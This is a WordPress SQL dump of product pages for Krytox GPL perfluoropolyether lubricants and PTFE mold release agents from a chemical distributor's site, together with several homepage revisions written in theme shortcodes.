INSERT INTO `wp_posts` VALUES (437, 2, '2016-08-18 15:09:42', '2016-08-18 15:09:42', 'One of the greatest advantages of using Krytox GPL 102 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 102 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 102', 'Krytox GPL 102 has a Oil Viscosity of 15 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -63°C to 132°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-gpl-102', '', '', '2016-10-04 14:59:53', '2016-10-04 14:59:53', '', 0, 'https://132.148.10.86/wordpress/product/gpl-102/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (438, 2, '2016-08-18 15:09:57', '2016-08-18 15:09:57', 'One of the greatest advantages of using Krytox GPL 103 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 103 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 103', 'Krytox GPL 103 has a Oil Viscosity of 30 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -60°C to 154°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-103', '', '', '2016-10-04 15:08:20', '2016-10-04 15:08:20', '', 0, 'https://132.148.10.86/wordpress/product/gpl-103/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (439, 2, '2016-08-18 15:10:11', '2016-08-18 15:10:11', 'One of the greatest advantages of using Krytox GPL 104 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 104 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 104', 'Krytox GPL 104 has a Oil Viscosity of 60 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -51°C to 179°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-104', '', '', '2016-10-04 15:09:29', '2016-10-04 15:09:29', '', 0, 'https://132.148.10.86/wordpress/product/gpl-104/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (440, 2, '2016-08-18 15:10:26', '2016-08-18 15:10:26', 'One of the greatest advantages of using Krytox GPL 105 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 105 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 105', 'Krytox GPL 105 has a Oil Viscosity of 160 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 204°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-105', '', '', '2016-10-04 15:10:37', '2016-10-04 15:10:37', '', 0, 'https://132.148.10.86/wordpress/product/gpl-105/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (441, 2, '2016-08-18 15:10:44', '2016-08-18 15:10:44', 'One of the greatest advantages of using Krytox GPL 106 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 106 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 106', 'Krytox GPL 106 has a Oil Viscosity of 243 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 260°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-gpl-106', '', '', '2016-10-04 15:12:20', '2016-10-04 15:12:20', '', 0, 'https://132.148.10.86/wordpress/product/gpl-106/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (442, 2, '2016-08-18 15:11:03', '2016-08-18 15:11:03', 'One of the greatest advantages of using Krytox GPL 107 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 107 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 107 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 107', 'Krytox GPL 207 has a Oil Viscosity of 450 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -30°C to 288°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-107', '', '', '2016-10-04 15:13:32', '2016-10-04 15:13:32', '', 0, 'https://132.148.10.86/wordpress/product/gpl-107/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (443, 1, '2016-08-18 15:12:06', '2016-08-18 15:12:06', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/"  animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:12:06', '2016-08-18 15:12:06', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (444, 3, '2017-06-05 12:40:59', '2017-06-05 12:40:59', '<h2>MS-143AX | Universal PTFE Release Agent</h2>\n<h3>Broad Range of Applications; Proprietary Binder Agent; Extended Reapplcati</h3>\nMS-143AX Universal PTFE Release Agent contains a proprietary surface activator that combined with PTFE results in superior initial release action with up to 5 times the number of release cycles on metal molds.  It is not recommended for use on rubber molds. MS-143AX Universal PTFE Release Agent is an excellent dry lubricants for rubber on steel application. Note: MS-143AX can only be applied by dip coating or wiping applications, it can not be sprayed.\n<ul>\n 	<li>Enhanced surface adhesion and durability to metallic molds</li>\n 	<li>Minimized initial release force</li>\n 	<li>Nonflammable; Chemically Inert</li>\n 	<li>Non-Migrating</li>\n 	<li>Low coefficient of friction</li>\n</ul>\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></p>', 'MS-143AX | Universal PTFE Release Agent', 'MS-143AX contains a proprietary surface activator that combined with PTFE results in superior initial release action with up to 5 times the number of release cycles on metal molds.  It is not recommended for use on rubber molds.  It is an excellent dry lubricants for rubber on steel application. Note: MS-143AX can only be applied by dip coating or wiping applications, it can not be sprayed.\n<ul>\n 	<li>Enhanced surface adhesion and durability to metallic molds</li>\n 	<li>Minimized initial release force</li>\n 	<li>Nonflammable; Chemically Inert</li>\n 	<li>Non-Migrating</li>\n 	<li>Low coefficient of friction</li>\n</ul>', 'inherit', 'closed', 'closed', '', '305-autosave-v1', '', '', '2017-06-05 12:40:59', '2017-06-05 12:40:59', '', 305, 'https://132.148.10.86/wordpress/305-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (445, 3, '2017-06-05 12:31:12', '2017-06-05 12:31:12', '<h2>MS-143TE | PTFE Mold Release Agents</h2>\n<h3>Superior Utility; Robust Release Agent Performance</h3>\nMS-143TE was developed as an efficient, economical and universal release agent. This PTFE mold release agents is a nonflammable, non-ozone depleting release agent/dry lubricant, containing a suspension of low-molecular PTFE (polytetrafluoroethylene) fluoropolymers.  As a dry lubricant, MS-143TE minimizes “slip-stick” and is ideal for low speed, light load applications. MS-143TE offers the following benefits:\n<ul>\n 	<li>Enhanced release agent durability/adhesion</li>\n 	<li>Efficient and consistent release of molded parts</li>\n 	<li>Outstanding lubricity (low coefficient of friction)</li>\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV, MS-122SE, and MS-143TE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. Many can be considered universal release agent.\n\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-143TE | PTFE Mold Release Agents', 'MS-143TE was developed as an efficient, economical and universal release agent. This formulation is a nonflammable, non-ozone depleting release agent/dry lubricant, containing a suspension of low-molecular PTFE (polytetrafluoroethylene) fluoropolymers.  As a dry lubricant, MS-143TE minimizes “slip-stick” and is ideal for low speed, light load applications. MS-143TE offers the following benefits:\n<ul>\n 	<li>Enhanced release agent durability/adhesion</li>\n 	<li>Efficient and consistent release of molded parts</li>\n 	<li>Outstanding lubricity (low coefficient of friction)</li>\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '303-autosave-v1', '', '', '2017-06-05 12:31:12', '2017-06-05 12:31:12', '', 303, 'https://132.148.10.86/wordpress/303-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (446, 1, '2016-08-18 15:23:08', '2016-08-18 15:23:08', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:23:08', '2016-08-18 15:23:08', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (447, 1, '2016-08-18 15:25:08', '2016-08-18 15:25:08', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" 